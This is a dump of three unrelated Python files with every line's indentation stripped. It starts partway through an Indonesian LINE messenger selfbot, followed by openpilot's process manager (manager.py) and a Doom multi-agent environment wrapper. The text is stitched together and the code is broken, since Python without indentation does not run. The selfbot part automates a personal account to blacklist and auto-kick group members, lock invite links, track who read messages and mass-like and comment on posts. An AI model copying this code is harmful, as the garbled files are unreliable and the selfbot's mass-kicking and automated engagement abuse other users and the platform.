cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
elif msg.text.lower() == '.....':
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
#=================================PUY SCRIPT FINISHED =============================================#
elif "Ban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
cl.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
cl.sendText(msg.to,_nametarget + " Not In Blacklist")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Delete From Blacklist")
except:
cl.sendText(msg.to,_name + " Not In Blacklist")
elif msg.text in ["Clear"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"Blacklist Telah Dibersihkan")
elif msg.text in ["Ban:on"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unban:on"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="*Blacklist*"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == 'scan blacklist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.kickoutFromGroup(op.param1,[op.param3])
cl.updateGroup(G)
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Selamat Datang.")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Selamat Jalan.")
print "MEMBER HAS LEFT THE GROUP"
#------------------------------------------------------------------------------#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from common.params import Params
from selfdrive.registration import register
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'gpsd',
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
doom_multiagent_wrapper.py
|
import threading
import time
from enum import Enum
from multiprocessing import Process
from queue import Empty, Queue
import faster_fifo
import cv2
import filelock
import gym
from filelock import FileLock
from sample_factory.envs.doom.doom_gym import doom_lock_file
from sample_factory.envs.doom.doom_render import concat_grid, cvt_doom_obs
from sample_factory.envs.doom.multiplayer.doom_multiagent import find_available_port, DEFAULT_UDP_PORT
from sample_factory.envs.env_utils import RewardShapingInterface, get_default_reward_shaping
from sample_factory.utils.utils import log
from functools import wraps
from time import sleep
def retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=False):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
for i in range(num_attempts):
try:
return func(*args, **kwargs)
except exception_class as e:
# This accesses the self instance variable
multiagent_wrapper_obj = args[0]
multiagent_wrapper_obj.initialized = False
multiagent_wrapper_obj.close()
# This is done to reset if it is in the step function
if should_reset:
multiagent_wrapper_obj.reset()
if i == num_attempts - 1:
raise
else:
log.error('Failed with error %r, trying again', e)
sleep(sleep_time)
return wrapper
return decorator
def safe_get(q, timeout=1e6, msg='Queue timeout'):
"""Using queue.get() with timeout is necessary, otherwise KeyboardInterrupt is not handled."""
while True:
try:
return q.get(timeout=timeout)
except Empty:
log.warning(msg)
def udp_port_num(env_config):
if env_config is None:
return DEFAULT_UDP_PORT
port_to_use = DEFAULT_UDP_PORT + 100 * env_config.worker_index + env_config.vector_index
return port_to_use
class TaskType(Enum):
INIT, TERMINATE, RESET, STEP, STEP_UPDATE, INFO, SET_ATTR = range(7)
def init_multiplayer_env(make_env_func, player_id, env_config, init_info=None):
env = make_env_func(player_id=player_id)
if env_config is not None and 'worker_index' in env_config:
env.unwrapped.worker_index = env_config.worker_index
if env_config is not None and 'vector_index' in env_config:
env.unwrapped.vector_index = env_config.vector_index
if init_info is None:
port_to_use = udp_port_num(env_config)
port = find_available_port(port_to_use, increment=1000)
log.debug('Using port %d', port)
init_info = dict(port=port)
env.unwrapped.init_info = init_info
env.seed(env.unwrapped.worker_index * 1000 + env.unwrapped.vector_index * 10 + player_id)
return env
class MultiAgentEnvWorker:
def __init__(self, player_id, make_env_func, env_config, use_multiprocessing=False, reset_on_init=True):
self.player_id = player_id
self.make_env_func = make_env_func
self.env_config = env_config
self.reset_on_init = reset_on_init
if use_multiprocessing:
self.process = Process(target=self.start, daemon=False)
self.task_queue, self.result_queue = faster_fifo.Queue(), faster_fifo.Queue()
else:
self.process = threading.Thread(target=self.start)
self.task_queue, self.result_queue = Queue(), Queue()
self.process.start()
def _init(self, init_info):
log.info('Initializing env for player %d, init_info: %r...', self.player_id, init_info)
env = init_multiplayer_env(self.make_env_func, self.player_id, self.env_config, init_info)
if self.reset_on_init:
env.reset()
return env
@staticmethod
def _terminate(env):
if env is None:
return
env.close()
@staticmethod
def _get_info(env):
"""Specific to custom VizDoom environments."""
info = {}
if hasattr(env.unwrapped, 'get_info_all'):
info = env.unwrapped.get_info_all() # info for the new episode
return info
def _set_env_attr(self, env, player_id, attr_chain, value):
"""Allows us to set an arbitrary attribute of the environment, e.g. attr_chain can be unwrapped.foo.bar"""
assert player_id == self.player_id
attrs = attr_chain.split('.')
curr_attr = env
try:
for attr_name in attrs[:-1]:
curr_attr = getattr(curr_attr, attr_name)
except AttributeError:
log.error('Env does not have an attribute %s', attr_chain)
attr_to_set = attrs[-1]
setattr(curr_attr, attr_to_set, value)
def start(self):
env = None
while True:
data, task_type = safe_get(self.task_queue)
if task_type == TaskType.INIT:
env = self._init(data)
self.result_queue.put(None) # signal we're done
continue
if task_type == TaskType.TERMINATE:
self._terminate(env)
break
results = None
if task_type == TaskType.RESET:
results = env.reset()
elif task_type == TaskType.INFO:
results = self._get_info(env)
elif task_type == TaskType.STEP or task_type == TaskType.STEP_UPDATE:
# collect obs, reward, done, and info
action = data
env.unwrapped.update_state = task_type == TaskType.STEP_UPDATE
results = env.step(action)
elif task_type == TaskType.SET_ATTR:
player_id, attr_chain, value = data
self._set_env_attr(env, player_id, attr_chain, value)
else:
raise Exception(f'Unknown task type {task_type}')
self.result_queue.put(results)
class MultiAgentEnv(gym.Env, RewardShapingInterface):
def __init__(self, num_agents, make_env_func, env_config, skip_frames):
gym.Env.__init__(self)
RewardShapingInterface.__init__(self)
self.num_agents = num_agents
log.debug('Multi agent env, num agents: %d', self.num_agents)
self.skip_frames = skip_frames # number of frames to skip (1 = no skip)
env = make_env_func(player_id=-1) # temporary env just to query observation_space and stuff
self.action_space = env.action_space
self.observation_space = env.observation_space
self.default_reward_shaping = get_default_reward_shaping(env)
env.close()
self.current_reward_shaping = [self.default_reward_shaping for _ in range(self.num_agents)]
self.make_env_func = make_env_func
self.safe_init = env_config is not None and env_config.get('safe_init', False)
if self.safe_init:
sleep_seconds = env_config.worker_index * 1.0
log.info('Sleeping %.3f seconds to avoid creating all envs at once', sleep_seconds)
time.sleep(sleep_seconds)
log.info('Done sleeping at %d', env_config.worker_index)
self.env_config = env_config
self.workers = None
# only needed when rendering
self.enable_rendering = False
self.last_obs = None
self.reset_on_init = True
self.initialized = False
def get_default_reward_shaping(self):
return self.default_reward_shaping
def get_current_reward_shaping(self, agent_idx: int):
return self.current_reward_shaping[agent_idx]
def set_reward_shaping(self, reward_shaping: dict, agent_idx: int):
self.current_reward_shaping[agent_idx] = reward_shaping
self.set_env_attr(
agent_idx, 'unwrapped.reward_shaping_interface.reward_shaping_scheme', reward_shaping,
)
def await_tasks(self, data, task_type, timeout=None):
"""
Task result is always a tuple of lists, e.g.:
(
[0th_agent_obs, 1st_agent_obs, ... ],
[0th_agent_reward, 1st_agent_reward, ... ],
...
)
If your "task" returns only one result per agent (e.g. reset() returns only the observation),
the result will be a tuple of length 1. It is a responsibility of the caller to index appropriately.
"""
if data is None:
data = [None] * self.num_agents
assert len(data) == self.num_agents
for i, worker in enumerate(self.workers):
worker.task_queue.put((data[i], task_type))
result_lists = None
for i, worker in enumerate(self.workers):
results = safe_get(
worker.result_queue,
timeout=0.2 if timeout is None else timeout,
msg=f'Takes a surprisingly long time to process task {task_type}, retry...',
)
if not isinstance(results, (tuple, list)):
results = [results]
if result_lists is None:
result_lists = tuple([] for _ in results)
for j, r in enumerate(results):
result_lists[j].append(r)
return result_lists
def _ensure_initialized(self):
if self.initialized:
return
self.workers = [
MultiAgentEnvWorker(i, self.make_env_func, self.env_config, reset_on_init=self.reset_on_init)
for i in range(self.num_agents)
]
init_attempt = 0
while True:
init_attempt += 1
try:
port_to_use = udp_port_num(self.env_config)
port = find_available_port(port_to_use, increment=1000)
log.debug('Using port %d', port)
init_info = dict(port=port)
lock_file = doom_lock_file(max_parallel=20)
lock = FileLock(lock_file)
with lock.acquire(timeout=10):
for i, worker in enumerate(self.workers):
worker.task_queue.put((init_info, TaskType.INIT))
if self.safe_init:
time.sleep(1.0) # just in case
else:
time.sleep(0.05)
for i, worker in enumerate(self.workers):
worker.result_queue.get(timeout=20)
except filelock.Timeout:
continue
except Exception:
raise RuntimeError('Critical error: worker stuck on initialization. Abort!')
else:
break
log.debug('%d agent workers initialized for env %d!', len(self.workers), self.env_config.worker_index)
self.initialized = True
@retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=False)
def info(self):
self._ensure_initialized()
info = self.await_tasks(None, TaskType.INFO)[0]
return info
@retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=False)
def reset(self):
self._ensure_initialized()
observation = self.await_tasks(None, TaskType.RESET, timeout=2.0)[0]
return observation
